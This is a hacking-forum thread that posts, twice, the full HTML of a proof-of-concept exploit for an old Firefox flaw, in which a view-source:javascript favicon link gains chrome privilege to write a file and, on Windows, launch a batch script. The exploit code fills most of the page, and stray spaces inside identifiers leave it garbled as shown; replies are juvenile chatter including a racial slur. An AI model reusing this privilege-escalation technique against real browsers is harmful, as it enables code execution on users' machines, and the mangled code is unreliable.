Home › Forum › Hacking › Exploits › Mozilla Firefox view-source:javascript url Code Execution Exploit:
Mozilla Firefox view-source:javascript url Code Execution Exploit:
Mozilla Firefox view-source:javascript url Code Execution Exploit:
[PHP]<html>
<head>
<title>Firelinking 2 - Proof-of-Concept by mikx</title>
<-- This PoC is cross platform : On Windows this example creates the file -->
<-- c:\booom.bat and launches it (opens a dos box with a dir command). On -->
<-- Linux (tested Fedora Core) and MacOSX the example creates the file -->
<-- ~/booom.txt or /booom.txt. Depending on caching the the script might -->
<-- run twice in some cases (this will create an additional booom-1.txt). -->
<link rel="SHORTCUT ICON" href="favicon.ico">
<script language="JavaScript" type="text/javascript">
var pf = navigator.platform.toLowerCase();
if (pf.indexOf("win") != -1) {
var os = "win";
} else if (pf.indexOf("mac") != -1) {
var os = "mac";
} else {
var os = "linux"
}
function runDemo() {
// this is an ugly caching workaround
document.getElementById('outhtml').innerHTML = "";
document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value
document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value
document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value
window.setTimeout("document.getElementById('outhtm l').innerHTML +=
document.getElementById('linkhtml_"+os+"').value", 300);
}
</script>
</head>
<body>
<div style="font-family:Verdana;font-size:11px;">
<div style="font-family:Verdana;font-size:15px;font-weight:bold;">Firelinking 2 - Proof-of-Concept</div>
<br><br>
<div style="width:600px">
<div id="outhtml" style="display:none"></div>
<textarea id="clearhtml" style="display:none">
<link rel="SHORTCUT ICON" href="favicon.ico">
</textarea>
<textarea id="linkhtml_win" style="display:none">
<link rel="SHORTCUT ICON" href="view-source:java script:delayedOpenWindow('
java script:netscape.security.PrivilegeManager.enablePr ivilege(\'UniversalXPConnect\');
file=Components.classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.
nsILocalFile);file.initWithPath(\'c:\\\\booom.bat\ ');file.createUnique(Components.interfaces.
nsIFile.NORMAL_FILE_TYPE,420);outputStream=Compone nts.classes[\'@mozilla.org/network/
file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutpu tStream);
outputStream.init(file,0x04|0x08|0x20,420,0);outpu t=\'@ECHO OFF\\n:BEGIN\\nCLS\\nDIR\\n
PAUSE\\n:END\';outputStream.write(output,output.le ngth);outputStream.close();file.launch();','','')" >
</textarea>
<textarea id="linkhtml_mac" style="display:none">
<link rel="SHORTCUT ICON" href="view-source:java script:delayedOpenWindow('java script:
netscape.security.PrivilegeManager.enablePrivilege (\'UniversalXPConnect\');file=Components.
classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.nsILocalFile );
file.initWithPath(\'/booom.txt\');file.createUnique(Components.interfac es.nsIFile.
NORMAL_FILE_TYPE,420);outputStream=Components.clas ses[\'@mozilla.org/network/
file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutpu tStream);
outputStream.init(file,0x04|0x08|0x20,420,0);outpu t=\'booom!\';outputStream.write
(output,output.length);outputStream.close();','',' ')">
</textarea>
<textarea id="linkhtml_linux" style="display:none">
<link rel="SHORTCUT ICON" href="view-source:java script:delayedOpenWindow('java script:
netscape.security.PrivilegeManager.enablePrivilege (\'UniversalXPConnect\');file=Components.
classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.nsILocalFile );file.
initWithPath(\'~/booom.txt\');file.createUnique(Components.interfac es.nsIFile.
NORMAL_FILE_TYPE,420);outputStream=Components.clas ses[\'@mozilla.org/network/
file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutpu tStream);
outputStream.init(file,0x04|0x08|0x20,420,0);outpu t=\'booom!\';outputStream.write
(output,output.length);outputStream.close();','',' ')">
</textarea>
<br><br>
<a href="#" onclick="runDemo();runDemo();">Run exploit</a>
</div>
</body>
</html>[/PHP]
<head>
<title>Firelinking 2 - Proof-of-Concept by mikx</title>
<-- This PoC is cross platform : On Windows this example creates the file -->
<-- c:\booom.bat and launches it (opens a dos box with a dir command). On -->
<-- Linux (tested Fedora Core) and MacOSX the example creates the file -->
<-- ~/booom.txt or /booom.txt. Depending on caching the the script might -->
<-- run twice in some cases (this will create an additional booom-1.txt). -->
<link rel="SHORTCUT ICON" href="favicon.ico">
<script language="JavaScript" type="text/javascript">
var pf = navigator.platform.toLowerCase();
if (pf.indexOf("win") != -1) {
var os = "win";
} else if (pf.indexOf("mac") != -1) {
var os = "mac";
} else {
var os = "linux"
}
function runDemo() {
// this is an ugly caching workaround
document.getElementById('outhtml').innerHTML = "";
document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value
document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value
document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value
window.setTimeout("document.getElementById('outhtm l').innerHTML +=
document.getElementById('linkhtml_"+os+"').value", 300);
}
</script>
</head>
<body>
<div style="font-family:Verdana;font-size:11px;">
<div style="font-family:Verdana;font-size:15px;font-weight:bold;">Firelinking 2 - Proof-of-Concept</div>
<br><br>
<div style="width:600px">
<div id="outhtml" style="display:none"></div>
<textarea id="clearhtml" style="display:none">
<link rel="SHORTCUT ICON" href="favicon.ico">
</textarea>
<textarea id="linkhtml_win" style="display:none">
<link rel="SHORTCUT ICON" href="view-source:java script:delayedOpenWindow('
java script:netscape.security.PrivilegeManager.enablePr ivilege(\'UniversalXPConnect\');
file=Components.classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.
nsILocalFile);file.initWithPath(\'c:\\\\booom.bat\ ');file.createUnique(Components.interfaces.
nsIFile.NORMAL_FILE_TYPE,420);outputStream=Compone nts.classes[\'@mozilla.org/network/
file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutpu tStream);
outputStream.init(file,0x04|0x08|0x20,420,0);outpu t=\'@ECHO OFF\\n:BEGIN\\nCLS\\nDIR\\n
PAUSE\\n:END\';outputStream.write(output,output.le ngth);outputStream.close();file.launch();','','')" >
</textarea>
<textarea id="linkhtml_mac" style="display:none">
<link rel="SHORTCUT ICON" href="view-source:java script:delayedOpenWindow('java script:
netscape.security.PrivilegeManager.enablePrivilege (\'UniversalXPConnect\');file=Components.
classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.nsILocalFile );
file.initWithPath(\'/booom.txt\');file.createUnique(Components.interfac es.nsIFile.
NORMAL_FILE_TYPE,420);outputStream=Components.clas ses[\'@mozilla.org/network/
file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutpu tStream);
outputStream.init(file,0x04|0x08|0x20,420,0);outpu t=\'booom!\';outputStream.write
(output,output.length);outputStream.close();','',' ')">
</textarea>
<textarea id="linkhtml_linux" style="display:none">
<link rel="SHORTCUT ICON" href="view-source:java script:delayedOpenWindow('java script:
netscape.security.PrivilegeManager.enablePrivilege (\'UniversalXPConnect\');file=Components.
classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.nsILocalFile );file.
initWithPath(\'~/booom.txt\');file.createUnique(Components.interfac es.nsIFile.
NORMAL_FILE_TYPE,420);outputStream=Components.clas ses[\'@mozilla.org/network/
file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutpu tStream);
outputStream.init(file,0x04|0x08|0x20,420,0);outpu t=\'booom!\';outputStream.write
(output,output.length);outputStream.close();','',' ')">
</textarea>
<br><br>
<a href="#" onclick="runDemo();runDemo();">Run exploit</a>
</div>
</body>
</html>[/PHP]
what is it? what exploit?
Check the code, so far all that I know is that it bypasses security and makes a file lol 
No idea what's in the file since I ain't gonna check, but if you want to know, go through the code
No idea what's in the file since I ain't gonna check, but if you want to know, go through the code
quote "Check the code, so far all that I know is that it bypasses security and makes a file lol "
omg XD
ps: mozilla ownz ie :P
omg XD
ps: mozilla ownz ie :P
Agreed. Mozilla pwns IE but then again I think the original version on Mozilla pwns Firefox.
This will delete your c:/ drive. right?
this will be good for runescape for veiwing its source code
nice necro noobs
SMFD NEWPHAG GET LIKE ME
yea cuz u can epicly bump 2 year old threads and get away with it!!
i found the rat orly
SDFU rat stupid chink
Holy shit...
That has got to be the biggest bump I've ever seen
That has got to be the biggest bump I've ever seen
Similar Threads
- 0Last post
- 12Last post
- 0Last post
- 7Last post
- 14Last post